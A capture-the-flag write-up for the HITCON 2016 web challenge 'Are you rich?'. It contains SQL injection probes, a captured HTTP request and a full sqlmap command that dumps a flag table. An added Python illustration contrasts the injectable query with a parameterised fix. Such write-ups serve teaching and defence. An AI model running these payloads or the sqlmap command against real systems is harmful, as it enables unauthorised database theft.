
Monday, 10 October 2016

HITCON CTF 2016: Are you rich? (Web) Write-up


Description:
Are you rich? Buy the flag!
http://52.197.140.254/are_you_rich/
PS: You should NOT pay anything for this challenge
Some error messages that are not related to the challenge have been removed
Solution:

1. Accessing the website shows two functions: Get our bitcoin address and Verify payment.


2. Trying "Get our bitcoin address" generates a Bitcoin address and then goes to verify it.


3. Not enough money. I guess that after generating our bitcoin address, the site inserts that address into a database, and Verify payment looks it up to check the payment. I try SQL injection in the Address field.

4. ' or 1=1# --- "Found more than 1 records"?

5. ' or 1=2# --- "does not have enough confirmed money"?

6. This confirms that the address parameter is vulnerable to SQL injection. I use Burp Suite to capture the HTTP request and copy it to a text file.

POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
Host: 52.197.140.254
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Origin: http://52.197.140.254
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
Accept-Encoding: gzip, deflate
Accept-Language: th,en;q=0.8

address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=

7. Using sqlmap's -r option to load the HTTP request from the text file, sqlmap confirms the vulnerability as time-based blind SQL injection. The final sqlmap command used to get the flag:

python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump

8. Wait several minutes to retrieve the flag.


In Burp Suite (Union Based)


Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}
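As an added illustration (not code from the original write-up or the challenge), a Python model of the verify.php lookup: the string-built query that produced the two messages above, beside a parameterised version, and a regression check that reports whether a page behaves as a yes/no oracle. SQLite is used here, so the injected payloads end in "-- " instead of the MySQL "#" comment from steps 4 and 5; the table layout, price threshold and second address are constructed.

```python
import sqlite3

PRICE_BTC = 1.0  # constructed threshold; the real challenge price is not given


def make_db():
    # Constructed in-memory table; only the address from the write-up is reused
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE payments (address TEXT, confirmed_btc REAL)")
    conn.executemany("INSERT INTO payments VALUES (?, ?)", [
        ("1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c", 0.0),
        ("1Constructed2ndAddressXXXXXXXXXXXXX", 0.0),
    ])
    return conn


def classify(rows):
    # The two messages the write-up observes from verify.php
    if len(rows) > 1:
        return "Found more than 1 records"
    if not rows or rows[0][0] < PRICE_BTC:
        return "does not have enough confirmed money"
    return "paid"


def verify_vulnerable(conn, address):
    # Address is spliced into the SQL text, so quotes and comments are parsed as SQL
    sql = "SELECT confirmed_btc FROM payments WHERE address = '" + address + "'"
    return classify(conn.execute(sql).fetchall())


def verify_fixed(conn, address):
    # Bound parameter: the driver passes the address as data, never as SQL syntax
    sql = "SELECT confirmed_btc FROM payments WHERE address = ?"
    return classify(conn.execute(sql, (address,)).fetchall())


def leaks_boolean_oracle(verify):
    # Regression check: a true and a false injected condition must give the same
    # response; if they differ, the page is a yes/no oracle (what --string keys on)
    conn = make_db()
    return verify(conn, "' or 1=1-- ") != verify(conn, "' or 1=2-- ")


if __name__ == "__main__":
    db = make_db()
    for payload in ("' or 1=1-- ", "' or 1=2-- "):
        print(repr(payload), "vulnerable:", verify_vulnerable(db, payload),
              "| fixed:", verify_fixed(db, payload))
    print("oracle leak, vulnerable:", leaks_boolean_oracle(verify_vulnerable))
    print("oracle leak, fixed:", leaks_boolean_oracle(verify_fixed))
```

The vulnerable function reproduces the "more than 1 records" versus "not enough confirmed money" split from steps 4 and 5; the parameterised one returns the same message for both payloads, which is the property the regression check asserts.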
